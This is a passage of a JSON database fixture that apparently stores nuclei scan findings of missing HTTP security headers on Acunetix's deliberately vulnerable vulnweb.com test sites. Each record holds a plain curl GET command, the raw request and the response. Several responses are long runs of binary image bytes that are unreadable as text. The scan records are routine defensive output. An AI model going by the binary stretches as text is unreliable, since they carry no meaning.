�\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� \tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 950, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "discovered_date": "2024-11-13T02:42:33.974Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/5.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4428\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:12 GMT\r\nEtag: "4dca64a1-114c"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0003\u0001\u0001\u0001\u0004\u0002\u0003\u0005\u0001\u0007\u0006��2\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0004\u0006\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011\u0004\u0012!1AQ\u0013"\u00052aq\u0006\u0014#B����R�\u0015b�r��\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006\u0007��/\u0011\u0001\u0003\u0002\u0005\u0001\u0007\u0004\u0002\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0013Qaq����"���\u0006�\u00142���\f\u0003\u0001\u0002\u0011\u0003\u0011?�\u001a�d�������0�V\u0015��gQ�%XmƲ ��Tg6�ru�Ʋ0��G\n>2y��d�EV\u0019m}3�1��<*������qY\u0016`��d��6�k"�w��r�{0�qY.��\u0019*>3��F\u001e\u0013u�\f�\u000f\u0018�Du2i��h.�H�2��\t\u0019^Ӗ�.z*�J��\u001d\u0014\u0002�@2ء\u0012\t\u0018=�+\u0012T\u00176.�-��EcZA\u0012,�*�!\t\u0003o\u0007�:�<��x����Fh�u�'\u000b\b6\u0001&�\u0003��\f4\r�|�Ӽ�@\u0005��>[$LL\r2Ѡ���\u0019ƈ���Ӆ�����\u0007�=N��2<t�R�*Xr�r�\u001d8?+\u000b�#2H��1�\u0012D�ሠ\u0006�6�9\u0006�o�}�\u0001`ֻV�V\f���./c�Y�p��4�z\u000fH�\u0011V\n��\u001b��u�\u0012)X\u0005�n��:��aU\u0004��\r?�?�\b�\rm^�����\r}��\nF�\u0019��I\u0004J�\u0015:�\u0003�d�?��SϬ��$!�j\u0004�6�_�_\u001fk�\r\\��UM4�(\b\u0016\u0017$����t���x$\u000e\u0019\u0003q�#ʚ�>�+\u001a9�3�;V��8��c��Lz\u0007Ӽ�6�53�\u0012�eZ8\t4\u0018���J�\u001c\u000e��4�@��M��1���\u0005EF�r9*H�(qV\u000b���,�q��������m��%� �\u0006�B�p�\u0004�1b\u0010��j9$�}?���,[M���\u0001\u001b�kQ\u001dױ�`�+l�iqf����Ww�%+\u0018���]���$�p/8󿡣�@���r�E�k\u001d�6<�\b��c\u0006�IYX���/�q��R:\u0018�5\n^%e\u001eǐ�\u0007��U}��<��&��R��)\u0012H��\r���<�9�&�W�I6�?a?9���!�uR��51>�\u000e��\u001e\u001dDl-8;ā����6\u000f?B\u001b\\n�jꧠ��q~c��i����$SH�\u00132L�@�W�*ё�f�z��+��m9���\u0014�b*��V�Z4o���V��\u001a�ٷJʭ�H�����\u000ex��\u001b�(��%�;+��U0��XKo���hi�\r4~��~`��(b»�z׎����h@`���6�eGݶ��V\b�\u0005�ʦ���6���\r�;�\u001d\t�@��s�C\u0014r�R3\u001f��2\t\u0014i���TG�:\u0010\b���B�'�(\\e�p� |�R�.�\u000b���t\u0005��\u0002C��7\u0016���"����8�\u0007M�E$,�&\u0014\u000e�<�\u0007��\u001d\t�4�JҼ�~��9jC,d�ف\u001c\u0001�;�]�\u0007kZ߇��P��\u0015�2�(k��/�\u0011�M���:�d�N�����林ԝ�CpX��8�/�\u0016<�\u001c�8������'�kkb�u\u0011G/�^O�T\u0014x�}Gׯ�Š�sJ\u0015�e\n�w�ZW�\r\u001e/�W{]{\u0005��UQ22]a}{�>]OK��F�*D&�7;��{��Q\u0010���C�P�G����v(\u0001��O8�ZWi��\u0001i#4֥A�ш��sW]��\u0013$�4N\u001fiV�n�\u0006\u001c��\u0010~��9#\u0001:\u0015F�H\u0003���\u0001��S���"��A%��x��\u000fw5���\u0003*�\u0003\u0016�IY�HY\u001byqE@��5��o�۾��\u0012(U_dP�V4-)$�J,�l�"��ךˌ\r,pƞ�s���\u00197B��-�C�m��\u000f\u0016\r��B�f�\u001b\u0014����\u001fE�ڄ����18��\u001d��UoU��"�оؤӳ0\u0006�p3cT����#�5\r$6x�\u0010z�&ʶ�Th\u001a#�V-\u0002j\u0002\u0015\u0005\t��\t\u0014M_#�\u001b�\u0005\u001e/+�óJ���F���%�K��R�F�*�2����~��hi�%d�4�Ez�\u0015BG�\u0006�5`t�\u0003�������*��I�\u000eù�9<e��@����xԊfQVv�@�]��xÂ��zI��c�\u0005u�A#*:�B\u0003Q�M\u0003G�DgSB���ޑ3����Z��\u0001�y\u0001�t錬\n�$��]\u0001\u0004�ˎ�x�\t��Y�\u0002��:d\u001a�A\u0010�f�\u001c�-�{�-tv݁���V2�.W5Y�\u0018\u000bKέ��,yt蓕�U��fP�[o�]\u0001aۥu'\u0011\u0012)��+\u0017ݹ\u001c8*\b,\b�{w\u0007���I�]\u0013Țy�\u0012eYD�C!dV\u001e�\t5�A�\u0002��\u000eT�B}k��1�2�K\u001f\u0014��.k\\30��F.ڗ\bݭ�}�j�,o�[\u0013\u001b\u001c�\u001a�<Qʂ�ov]�`�n��\u0012mH��^�古T�|r��]�\u0002O\u0015�u'�\u001c���������$�\u00166�rgK��]��\u0019����:�\n_;��}�\r�j\u0010�����sn�N�]��뷋��L�L�E\u0014Q�Wolq�v\u0002�/h#ڶ;��rT\u001b����1X�{I{@��d��d�\u000fóG�D�j�(Ν��\tm\u001f1a@��r7X\r^E�@�t�!�U�+\u001bI��GP\u0019�\nwn��\u0010\u000f\u001b�b\u000fZ 篡�ӟO<���bd(����i�n��o\u001b���q��������7z\u0016#�U���������fe^\u001a���.kYrQ�4E�5����d��\u001c\u0002NԠ�\u0010��$w��O�0$\u0012��x���L���\u0004��.�lR�c�H5���Ŭ1��Y\n�\u0006�\\\u0005\u0003�_<�n�՞2��'u�84s�B\u001a��i��J\u0002�*�GI1�a\u0011�6�T��\u000b*�\u000bW�\u001f�~���P`��P��ۻ1w��fbI�9���h��\b����\u0015QI&�\u0001G=z<��\u0015_\u0012�i\u0001/c@��ZS�H��b\u0012��\u0018�K�`R9w,G\u0002\r_S���K�ַZ��~!9�4��5Dc܇jPF\u001cݐ�l}�{4���锉��*fm�����׻h\u0015f��\u0019{z!��\u001d8W`_���\u0005�W`C��o�=M�\fG\u000fu`\u0001���\u0010\u0019%<��fk����I/�4_\u0001�/�f_�,(�HǫРM�=\u0005�?z�mY;����\t\nzu��篃]\u000em|GYꬔ�B�%MY՟�\u0017]<�kkUQ\u0015���V76�D�������\f�������/�p�M\u0010!����o��J�[�;\u001b\u0004_RB�#\u0005��@�� �=8$_�p�Y\nV�2\u0016�%��\u0007��yѨgӘ\r\u0018�=7W��\u001f�\u0016�|\u001b=1��b�+�<�� <O�j�\u0003V玎�+~�Q����x���\u001d��?\u0010O,_��'��C\u001bN�b�<�n\n\u0018��n��\u0018�\u0015d_��N\u0011��;�\fȼ���͑��{4�tq�:HF�I57"�\f�\u0013a�F��������B��'$���\u0019cy^��8���\u001e6�^E�\u000e_����ru��La��\u0019�6�\r\u0005t$\u0017b�\u0016�kn9�U���?�U�m�\u0015��O5|�z#��;.��Ԛ�i*���v�b\u0005� ]mcԟq��\f�l��\t%E�\u001c�'?��O\u0007�'��)�њ8�\u000b�u\u0006�Y���nQ�ߥ�9��\u0002\r\n��W\u0015�����i�u�qFY�)U�n��\u0002��ӽ\u000b$�,~f#(t��87���G>*�}z��/{�@5S��z\u0016�\n�!f�H�\u0019\u0002m\f�6��n�\u001b`\u0005�NVȻ\u0013�9\u0004��]����7W�,�,��_zG\fP@�!�\u0004h��\n\u0005\u0001}�;�p�,��d��Z�O\u0003�j<�t�\b�A2\u001a�\u0013|u�+��*�S�Ԑ\u0011�3���������h��?A�V2\t�,�\u0015��*���A�Zy����d'k*�-�M����n�\u0007��\u0016E�S\u0011C\u000b�%���_�}�50j\u0016#�i�ƀ���W�U��j�y�1\u000b\u0006��\u0013��$��2Q�uA��P��I�2i=�\u001b��\rq�h�P+�\t��$��\r$���x�`��\u0001\u0007�\u0004U����p\u0004E�Ԅt8�Dl!����\u000e��\u0016���%�j&�\u001eÓҸ\u001c�\u0005��uh�eT\by��ہ\u0016v��]��;���k�^��/#6�����l�\b\u0015`\u0002�x\u0007�8�{<�\u0007\u0006�\u0015���ZD�\u0002Á�Z�Yv�3X�x�]�\u000b9:v����\u001c\u001fo��*�t������l'���\u0015d�)�XC����A?�[�;\u001e0̆�\u0006���{$�:\u0011~E�\u001eˌE_�:�cd�6����@\t x\u001f�ZX�0���r\b�\u000b&�X5q��W��\u00114!Ķ(\u000b�P�\u0015�!`�\fQP��\u0016]���S@(n�\u0015<�?sB�h����=\u001e,�&�63��׿mO�ȅ\t I�C\u001c��\u0010�ɽ�ŀ꠆�u\u0004\u001a�#��|�`j��T�\u0014h�1=�\u0004W ݃�&󷦱�fU\u0014\u000b��#�O'��F�>y�\u0013�1���|�&U\u0004�`,{�\n8�g�$���N�!sjň\u00062�]\u001b����Uu�s����s�`t%�T�\u001bzr���\u001bd$h�����&�鿱Q��Z2��J�E3�.��#���\njd3\u0015�L��R�E��d�\u001cw<p:_$N҅�Nc\u0006��\nO���T�5\b�G#iF�\u0011?.����@������Y�y\u001c�̞h*gf\u0014�3-�N��#B;��z���b\u00074t�E�P�ʦ3 ��v��H\u0004\u000b�\u0016y=,���\u0014�"x�\u0002�����J�\u0005J�<�$�\u0004U^Dح�כ\u001dc�c\u001aK��K_���9^\u0018�W�aZ�]��Զ’\u0002�T�\u0006(y��\u000f���9c\u001c<�\u0014���,�t��Y��_o\u0019\u0016������7��b�T��cma��q�Y�^\u0017��N#V+�q�.�C"���L\b�M��:\u0002~�k�|�}�xA�*���8����Y\u00022�*�\u0004\n6��\u0001�\u0003���\u000e+�I\u001e�T\u0004\u0006�*�t�/8Xb��\f�akr��V4��$���Cvp��.W�\b\u001a�\r��5F\u0016�7F�o[�\u001d�#��w}1��n\u0010MHٛ���k��L�,Z��\u0005\u0014Esȫ\u0007�:x�k�U��h�~ߘ���^*��\u0019��8X���|x4L:�Ga����]Z�\u001b,jC9�!�\u001e\b����ŞVaL���Qg9~p\f��+���\u0019�\u001a��l�p�\u0018�Q�\f1'F\u0018a�$g\u0018�\u0018c\u0014�u\u001d��o�\u0018bR���\u0018`�F\u0018a�$a�\u0018�Fr�\u0018bF�a�\u0018(���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 951, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:42:34.254Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 952, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:42:34.534Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 953, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "discovered_date": "2024-11-13T02:42:34.838Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/6.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4345\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:20 GMT\r\nEtag: "4dca64a1-10f9"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , 